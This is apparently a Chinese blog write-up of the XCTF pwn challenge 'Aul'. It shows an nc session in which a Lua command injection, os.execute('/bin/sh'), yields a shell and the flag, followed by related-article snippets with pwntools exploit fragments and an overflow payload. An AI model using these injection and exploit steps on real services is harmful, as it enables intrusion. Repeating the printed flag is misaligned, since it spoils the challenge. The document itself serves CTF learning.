xctf pwn Aul

最新推荐文章于 2022-12-16 11:19:14 发布
最新推荐文章于 2022-12-16 11:19:14 发布
阅读量367 收藏
点赞数
分类专栏: 题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/100013854
版权

对于这道题我…

binbin@ubuntu:~$ nc 111.198.29.45 33083
let's play a game
| 0 0 0 0 0 0 0 0 |
| 0 1 0 0 0 0 4 0 |
| 0 3 2 2 4 1 4 4 |
| 0 3 2 3 2 3 4 3 |
| 4 b 2 2 4 4 3 4 |
| 3 2 4 4 1 1 2 2 |
| 3 3 c d 3 3 2 3 |
| 3 2 1 4 4 a 2 4 |

连上去是这样…
我就直接懵了玩了好一会又百度google终于了解他是一个脚本语言
然后我乱输入发现有help还是乱码
最后发现是命令执行…
直接输入os.execute(‘bin/sh’)

os.execute('/bin/sh')            
ls
bin
dev
flag
lib
lib64
run.sh
scripty
server.lua
server.luac
cat flag
cyberpeace{04f1807e504849d8dcf78a46c9aca2ec}

服了

doudoudedi
关注
专栏目录
Aul(xctf)
weixin_43868725的博客
08-31 421
0x0 利用过程 1.题目没有给附件,直接使用nc连接发现是一个交互的场景,输入help之后输出了一堆东西。 通过开头可以猜测出这是Lua编写的脚本,其中还有一些字符串很像函数的名字。 2.输入help泄露出的函数名字。 writeline io.open() 通过错误信息可以得知程序将输入的字符串转化成相应的函数执行并返回结果。 3.确定了程序的功能后,输入lua脚本执行系统命令的语句。 发现getshell了。 0x1 exp from pwn import * sh=remote('220.2
xctf pwn 踩坑笔记(一):以xctf入门题level3为例
xiongzixun的博客
10-30 511
操作环境:ubuntu16.04 +惠普台式机 IDA环境:win10 +联想笔记本** 1.打开文件 xctf中的附件一般为application/octet-stream 而且为了能够使用,我们必须要先通过chmod命令获得X权限 如果是压缩文件还要先unzip或者tar等试一下 然后,通过checksec 这个文件以后,一定要先关注Arch,也就是这个ELF究竟是64位,还是32位。 因...
攻防世界re1
keep_reading的博客
09-26 234
文章目录攻防世界re1 攻防世界re1 (dword:由 4 字节长(32 位整数)的数字表示的数据) 查壳脱壳 先找main函数翻译成伪代码 分析伪代码找到这个字符串(还有下边那个dq) 16进制大端小端存储
攻防世界pwn高手进阶(持续更新)
qq_42988973的博客
12-16 714
攻防世界pwn高手进阶wp
pwn训练 pwnable.kr brainfuck
doudoudedi
09-08 371
这是一道pwnable第二模块的题目 这道题开始看不懂emem,发现是一个brainfuck的解释器发现有对内存可以读写控制的函数还有一个野指针emem就是他了开始发现只要把memset函数覆写成为gets然后输入/bin/sh再是将fgets覆写成为system 第一步泄露putchar函数的真实地址然后算出libc基址 计算出system,gets的地址 在将putchar写成main 然后就...
XCTF PWN level0
prettyX的博客
06-09 315
查看基本信息 尝试运行 IDA F5 再看下vulnerable_function()函数,存在溢出 同时,还存在callsystem()函数 所以把返回地址,覆盖到callsystem()函数地址,即可 Exp 注意:因为Python2不再维护,编写脚本使用Python3,使用Python3和2的区别,就是把Payload作为占位的部分变成Bytes #python3 from pwn import * p=remote('111.200.241.244',..
XCTF pwn-100(使用DynELF)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-14 343
from pwn import * #p = process("./pwn-100") p = remote("111.198.29.45",37259) elf = ELF("./pwn-100") read_got = elf.got['read'] puts_plt = elf.plt['puts'] start = 0x400550 pop_rdi = 0x400763 #ROPgad...
2020XCTF华为云专场pwn题WP
Sakura给爷pwn全场
12-23 520
Pwn CPP 解题思路 题⽬存在uaf,结合堆⻛⽔getshell #!/usr/bin/python #coding:utf-8 from pwn import * context.log_level='debug' #io=process("./chall",env={"LD_PRELOAD":"./libc-2.31.so"}) io=remote('124.70.12.210', 10002) libc=ELF("./libc-2.31.so") sla=lambda a : io.sendlin
XCTF-PWN welpwn
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-16 657
使用LibcSearcher解法 使用GDB动态调试下,发现 0x7fffffffdae0-0x7fffffffdb00是函数是echo的栈帧 0x7fffffffdb00开始就是属于main函数的栈帧 0x7fffffffdb00-0x7fffffffdb08是上一个栈帧的rbp,已经被覆盖 0x7fffffffdb08-0x7fffffffdb0f是retn返回的地址 可以通过4个pop把...
4-ReeHY-main-100 [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列22
重新启程
12-26 697
题目地址:4-ReeHY-main-100 本题是高手进阶区的第11题,已经逐步稳定在5颗星的难度级别了。 废话不说,看看题目先 照例检查一下保护机制: [*] '/ctf/work/python/4-ReeHY-main-100/4-ReeHY-main' Arch: amd64-64-little RELRO: Partial RELRO Sta...
xctf高手进阶题之pwn-100
neuisf的博客
01-25 678
此题重点为DynELF函数的使用。在函数 sub_40068E()中声明了一个大小为0x40的缓冲区,然后通过函数sub_40063D((__int64)&v1, 0xC8u);读取标准输入内容到该缓冲区,读入的长度为0xC8,大于缓冲区大小0x40,存在溢出漏洞。可以通过溢出后覆盖函数的返回地址:1.输出got表的函数地址;2.向可写段地址写入字符串"/bin/sh"。 ...
暑假pwn训练(十四) 记录一下我调试pwn的过程
doudoudedi
08-27 564
emem其实我是顺便记录一下我调试的命令哈 pwngdb 这个工具调试对堆有好处然后gdb-peda对输出反编译的代码观察有好处所以你们可以选择反正我是都有~~ babyrop 是一道基础的pwn题简单的栈溢出 这里我就简单的用这个程序来练一下我的调试技术 main函数 int __cdecl main() { int buf; // [esp+4h] [ebp-14h] char v2;...
aul 学习测试(测量)
weixin_34234823的博客
09-08 219
-------------------aul5 ----------test0------------------------- select file#,rfile#,name from v$datafile rac1-> ./...bin  Register Code: VDTL-ZSMR-RBBL-ATFV-JBKK AUL : AnySQL UnLoader(...
攻防世界 reverse 进阶 easyre-153
09-03 1179
easyre-153 查壳: upx壳 脱壳: 1 int __cdecl main(int argc, const char **argv, const char **envp) 2 { 3 int pipedes[2]; // [esp+18h] [ebp-38h] 4 __pid_t v5; // [esp+20h] [ebp...
攻防世界-Crypto-Easy-one(main函数传参、加密代码审计)-Hack-you-2014
Sea_Sand息禅
04-26 2682
下载文件解压得: 加密代码: #include <stdlib.h> #include <stdio.h> #include <string.h> int main(int argc, char **argv) { if (argc != 3) { printf("USAGE: %s INPUT OUTPUT\n", argv[0]); ...
攻防世界 - pwn100 - WriteUp
哒君的博客
06-11 4181
pwn100 文件链接 -> Github checksec 寻找漏洞 sub_40063D 函数中获取输入存放到 v1 ,存在栈溢出漏洞 攻击思路 该程序中没用system函数,也没有binsh字符串,而且参数是经过寄存器传递的,所以要通过ROP来达成泄露 libc ,写入 /bin/sh 的操作 寄存器 rdi 中存放的是写入的地址,rsi 是写入的字节数,所以可以通过 po...
暑假训练pwn(七) pwnable mistake
doudoudedi
08-10 139
终于做了一部分pwnable这道题很有意思感觉不像pwn 连上去有3个文件一个c文件一个执行文件一个password 打开c #include <stdio.h> #include <fcntl.h> #define PW_LEN 10 #define XORKEY 1 void xor(char* s, int len){ int i; for(i=0; i&lt...
DUL、ODU和AUL介绍(原创)
czmmiao的专栏
05-24 848
概述 假设我们的数据库遇到以下情况: 第一, 没有备份; 第二, 常规方法无法恢复; 第三, 数据很重要, 但又无法或成本太高而进行重新输入. 如丢失了Oracle的System表空间, System表空间损坏到无法启动的地步, 意外删除表空间或表, 意外截断(Truncate)表等, 在这3中情况下, 最后的方法就是通过工具直接读取数据文件里的数据,将我们的数据找回来。并且工具不需要O...
xctf secret_file
doudoudedi
10-02 375
最近事情有点多我又做不来真是的唉 做到后面有种无力感 ~~ main函数 简而言之就是你输入一串数字sha256与系统的匹配正确也不会怎么样 我虽然我会sha256但是我会栈溢出阿!!! 关键在这里我们将前面的都覆盖然后将加上我们调试而知的正确sha256然后就是命令执行了,清楚的看见参数是在11b的位置 ython -c 'print "A"*0x100+"ls;".ljust(0x1B,...
xctf supersqli
最新发布
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值